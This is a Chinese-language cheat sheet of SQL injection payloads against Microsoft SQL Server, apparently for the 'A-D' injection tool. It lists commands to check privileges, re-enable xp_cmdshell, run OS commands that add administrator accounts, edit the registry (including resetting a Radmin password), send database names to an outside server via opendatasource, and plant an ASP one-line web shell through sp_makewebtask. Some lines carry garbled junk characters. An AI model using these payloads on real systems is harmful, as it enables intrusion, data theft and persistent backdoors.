阿D常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行(多语句)执行
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
执行命令
1 [1 m! T/ w6 [7 k X( S;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
" {1 \4 J) q; g9 @+ j, U- R$ K4 F+ j9 c+ R3 Y5 [0 S9 P2 x8 s
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

数据库备份
backup database pubs to disk = 'c:\123.bak'
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序,但赋予的参数是 Process ID。
利用“工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。
xp_unpackcab 'c:\test.cab','c:\temp',1

某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234% e+ J' Y: a: S6 Q; U% z. L# R$ C' X3 k
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--: u% U) s1 F( y' d1 p( B

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3